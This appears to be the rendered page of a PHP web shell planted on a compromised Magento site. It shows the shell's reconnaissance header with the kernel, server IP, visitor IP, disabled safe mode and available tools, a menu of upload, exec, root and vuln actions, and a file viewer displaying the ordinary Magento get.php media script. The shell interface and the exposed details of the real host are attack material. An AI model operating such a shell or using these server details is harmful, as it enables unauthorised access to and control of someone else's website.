Kernel : Linux vmw02p.internet-indee.net 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Tue Nov 16 14:42:35 UTC 2021 x86_64
Disable function : NONE
Safe mode : OFF
Host : firofichi.it | Server ip : 5.196.164.15 | Your ip : 18.188.168.78 | Time @ Server : 19 Oct 2024 07:18:18
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/webmaster/massimoborgia/test/pub/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/webmaster/massimoborgia/test/pub/get.php

<?php
/**
 * Public media files entry point
 *
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */

use Magento\Framework\App\Cache\Frontend\Factory;
use Magento\Framework\App\ObjectManagerFactory;
use Magento\Framework\HTTP\PhpEnvironment\Request;
use Magento\Framework\Stdlib\Cookie\PhpCookieReader;

require dirname(__DIR__) . '/app/bootstrap.php';

$mediaDirectory = null;
$allowedResources = [];
$configCacheFile = BP . '/var/resource_config.json';

$isAllowed = function ($resource, array $allowedResources) {
    foreach ($allowedResources as $allowedResource) {
        if (0 === stripos($resource, $allowedResource)) {
            return true;
        }
    }
    return false;
};

$request = new \Magento\MediaStorage\Model\File\Storage\Request(
    new Request(
        new PhpCookieReader(),
        new Magento\Framework\Stdlib\StringUtils()
    )
);
$relativePath = $request->getPathInfo();
if (file_exists($configCacheFile) && is_readable($configCacheFile)) {
    $config = json_decode(file_get_contents($configCacheFile), true);

    //checking update time
    if (filemtime($configCacheFile) + $config['update_time'] > time()) {
        $mediaDirectory = $config['media_directory'];
        $allowedResources = $config['allowed_resources'];

        // Serve file if it's materialized
        if ($mediaDirectory) {
            if (!$isAllowed($relativePath, $allowedResources)) {
                require_once 'errors/404.php';
                exit;
            }
            $mediaAbsPath = $mediaDirectory . '/' . $relativePath;
            if (is_readable($mediaAbsPath)) {
                if (is_dir($mediaAbsPath)) {
                    require_once 'errors/404.php';
                    exit;
                }
                $transfer = new \Magento\Framework\File\Transfer\Adapter\Http(
                    new \Magento\Framework\HTTP\PhpEnvironment\Response(),
                    new \Magento\Framework\File\Mime()
                );
                $transfer->send($mediaAbsPath);
                exit;
            }
        }
    }
}

// Materialize file in application
$params = $_SERVER;
if (empty($mediaDirectory)) {
    $params[ObjectManagerFactory::INIT_PARAM_DEPLOYMENT_CONFIG] = [];
    $params[Factory::PARAM_CACHE_FORCED_OPTIONS] = ['frontend_options' => ['disable_save' => true]];
}
$bootstrap = \Magento\Framework\App\Bootstrap::create(BP, $params);
/** @var \Magento\MediaStorage\App\Media $app */
$app = $bootstrap->createApplication(
    \Magento\MediaStorage\App\Media::class,
    [
        'mediaDirectory' => $mediaDirectory,
        'configCacheFile' => $configCacheFile,
        'isAllowed' => $isAllowed,
        'relativeFileName' => $relativePath,
    ]
);
$bootstrap->run($app);